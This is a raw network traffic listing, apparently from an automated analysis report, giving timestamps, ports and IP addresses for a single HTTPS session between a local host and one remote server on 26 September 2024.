Sep 26, 2024 10:58:05.007730007 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.007761955 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.007782936 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.036957979 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.036993980 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.037125111 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.037139893 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.037193060 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.056521893 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.056555986 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.056638956 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.056647062 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.056658983 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.056685925 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.072910070 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.072979927 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.073069096 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.073081970 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.073111057 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.073131084 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.073419094 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.073462009 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.073494911 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.073506117 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.073533058 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.073549986 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.074110031 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.074151039 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.074197054 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.074207067 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.074232101 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.074265003 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.074489117 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.074548006 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.074574947 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.074585915 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.074609995 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.074635029 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.075020075 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.075067043 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.075100899 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.075112104 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.075136900 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.075160980 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.095014095 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.095067024 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.095119953 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.095146894 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.095164061 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.095184088 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.124604940 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.124629021 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.124768019 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.124803066 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.124856949 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.143996000 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.144040108 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.144150019 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.144160032 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.144205093 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.144221067 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.159794092 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.159837008 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.159995079 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.160003901 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.160049915 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.160448074 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.160509109 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.160528898 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.160535097 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.160550117 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.160576105 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.160890102 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.160933018 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.160958052 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.160964012 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.160975933 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.161001921 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.161621094 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.161679029 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.161695957 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.161721945 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.161736965 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.161768913 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.162182093 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.162223101 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.162240028 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.162246943 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.162261009 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.162286043 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.182576895 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.182626009 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.182853937 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.182868958 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.182928085 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.212090015 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.212119102 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.212256908 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.212271929 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.212327957 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.231426954 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.231461048 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.231592894 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.231621027 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.231668949 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.247426033 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.247447968 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.247509956 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.247522116 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.247538090 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.247567892 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.248267889 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.248301029 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.248343945 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.248349905 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.248379946 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.248408079 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.248698950 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.248728037 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.248766899 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.248773098 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.248800039 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.248822927 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.249237061 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.249258995 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.249300957 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.249306917 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.249321938 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.249342918 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.249927044 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.249953985 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.250005007 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.250013113 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.250040054 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.250066996 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.269932032 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.269977093 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.270087957 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.270087957 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.270154953 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.270241022 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.299712896 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.299767971 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.299860954 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.299891949 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.299911976 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.299940109 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.318867922 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.318897963 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.319004059 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.319063902 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.319128990 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.335088015 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.335155010 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.335226059 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.335262060 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.335290909 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.335313082 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.335736990 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.335800886 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.335833073 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.335845947 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.335871935 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.335896969 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.336412907 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.336458921 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.336493969 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.336507082 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.336533070 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.336564064 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.336997032 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.337044001 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.337076902 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.337089062 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.337142944 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.337142944 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.337392092 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.337439060 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.337471962 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.337485075 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.337515116 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.337539911 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.357711077 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.357770920 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.357892036 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.357919931 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.357973099 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.357990980 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.387274981 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.387341976 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.387415886 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.387458086 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.387475014 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.387500048 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.406533003 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.406579018 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.406677008 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.406706095 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.406733036 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.406749964 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.422446012 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.422467947 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.422548056 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.422595024 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.422638893 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.423079014 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.423105955 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.423156977 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.423165083 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.423198938 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.423754930 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.423775911 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.423810959 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.423823118 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.423841000 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.423856974 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.424350977 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.424370050 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.424417019 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.424423933 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.424458027 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.424659014 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.424678087 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.424725056 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.424731970 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.424768925 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.445045948 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.445101976 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.445178032 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.445214033 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.445231915 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.445264101 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.474708080 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.474756002 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.474972963 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.475040913 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.475112915 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.493962049 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.494028091 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.494096041 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.494112968 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.494131088 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.494162083 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.510128021 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.510163069 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.510241985 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.510270119 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.510296106 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.510315895 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.510555029 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.510574102 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.510615110 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.510627985 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.510654926 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.510673046 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.511687994 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.511706114 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.511749983 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.511763096 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.511790037 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.511806965 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.512224913 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.512243986 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.512301922 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.512316942 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.512367010 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.512563944 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.512593031 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.512629032 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.512641907 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.512674093 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.512695074 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.532809019 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.532845974 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.532919884 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.532943964 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.532982111 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.562426090 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.562452078 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.562625885 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.562712908 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.562772036 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.581435919 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.581458092 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.581576109 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.581587076 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.581640959 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.597681999 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
